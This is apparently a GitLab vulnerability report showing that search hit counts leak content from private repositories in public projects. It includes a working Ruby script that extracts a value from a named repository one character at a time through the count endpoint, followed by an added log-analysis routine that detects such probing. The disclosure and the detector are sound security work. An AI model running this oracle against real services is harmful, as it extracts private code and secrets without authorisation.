Search count can leak content of private repositories in public projects
Summary
Using https://gitlab.com/search/count it is possible to leak information from private repositories in public projects.
Steps to reproduce
The following script illustrates the issue by leaking, character by character, the GITLAB_APP_SECRET test value from the customers-gitlab-com repository, which is not public (although the project is). (Note that the value isn't secret; it's a test value being defined here.)
#!/usr/bin/ruby
require 'httparty'
require 'json'
require 'cgi'   # needed for CGI.escape below; missing from the original listing

COUNT = '
.wwwwwwww.
.w" "WW" "w.
." /\ /\ ".
|\ o o /|
\| ___\/___ |/
/ \ \_v__v_/ / \
/ | \________/ | \
> \ WWWW / <
\ \ "" / /
\ \ / /
'

repo_id = '2670515'                   # gitlab-org/customers-gitlab-com
group_id = '9970'                     # gitlab-org
partial_string = "GITLAB_APP_SECRET=" # known prefix of the value being leaked

puts COUNT
puts
puts "~> Starting the count attack!"
puts

@chars = %W[a b c d e f 0 1 2 3 4 5 6 7 8 9] # candidate characters; adjust as needed
@results = {}

# Appends each candidate character to the known prefix, queries /search/count and,
# whenever the reported count is non-zero, recurses with the extended prefix.
def find_next(url, str)
  @chars.each do |c|
    response = HTTParty.get(url + str + c + "%22") # %22 closes the quoted search term
    count = JSON.parse(response.body)
    if count["count"] != "0"
      follow = str + c
      puts "~> Count found: #{follow}"
      find_next(url, follow)
    end
  end
end

find_next("https://gitlab.com/search/count?group_id=#{group_id}&scope=blobs&search=r%3A#{repo_id}%20%22#{CGI.escape(partial_string)}", "")
In the demo script we limit the search results to the customers-gitlab-com repository with r:2670515 in the query; 2670515 is that project's id.
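A defensive check, added here and not part of the original report or of GitLab's own code: it scans constructed web-server log lines (sample clients and requests, not real GitLab.com logs) for the footprint the script above leaves, a run of /search/count requests from one client whose quoted search term grows by exactly one character per hit.

```ruby
require 'cgi'
require 'uri'

# Constructed sample access-log lines ("client method path"), not real GitLab.com traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.7 GET /search/count?group_id=9970&scope=blobs&search=r%3A2670515%20%22GITLAB_APP_SECRET%3Da%22
  198.51.100.4 GET /search?search=docker
  203.0.113.7 GET /search/count?group_id=9970&scope=blobs&search=r%3A2670515%20%22GITLAB_APP_SECRET%3Db%22
  203.0.113.7 GET /search/count?group_id=9970&scope=blobs&search=r%3A2670515%20%22GITLAB_APP_SECRET%3Dba%22
  203.0.113.7 GET /search/count?group_id=9970&scope=blobs&search=r%3A2670515%20%22GITLAB_APP_SECRET%3Dbaf%22
  203.0.113.7 GET /search/count?group_id=9970&scope=blobs&search=r%3A2670515%20%22GITLAB_APP_SECRET%3Dbaf1%22
  198.51.100.4 GET /search/count?group_id=9970&scope=blobs&search=r%3A2670515%20%22README%22
LOG

# Decoded "search" parameter of a /search/count request, or nil for any other request.
def count_search_term(path)
  uri = URI.parse(path)
  return nil unless uri.path == '/search/count' && uri.query
  CGI.parse(uri.query)['search'].first
end

# /search/count search terms per client, in request order.
def terms_by_client(log)
  log.each_line.with_object(Hash.new { |h, k| h[k] = [] }) do |line, acc|
    client, _method, path = line.split
    term = count_search_term(path)
    acc[client] << term if term
  end
end

# Longest chain in which each term extends an earlier one by exactly one character
# (the closing quote is dropped first, since the oracle appends it after every guess).
def longest_extension_chain(terms)
  stripped = terms.map { |t| t.chomp('"') }
  chain = Array.new(stripped.size, 1)
  stripped.each_with_index do |t, i|
    (0...i).each do |j|
      p = stripped[j]
      next unless t.length == p.length + 1 && t.start_with?(p)
      chain[i] = [chain[i], chain[j] + 1].max
    end
  end
  chain.max || 0
end

# Clients whose /search/count traffic shows a prefix walk of at least `threshold` steps.
def flag_oracle_walks(log, threshold: 3)
  terms_by_client(log).select { |_c, terms| longest_extension_chain(terms) >= threshold }.keys
end
```

Running `flag_oracle_walks(SAMPLE_LOG)` on the sample returns only the walking client; the threshold trades false positives from users refining a search by hand against how early the walk is caught.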
What is the current bug behavior?
The search hit count includes results from private repositories in public projects, which leaks their content.
What is the expected correct behavior?
The search hit count should not include private repositories.
Relevant logs and/or screenshots
Output of checks
This bug happens on GitLab.com
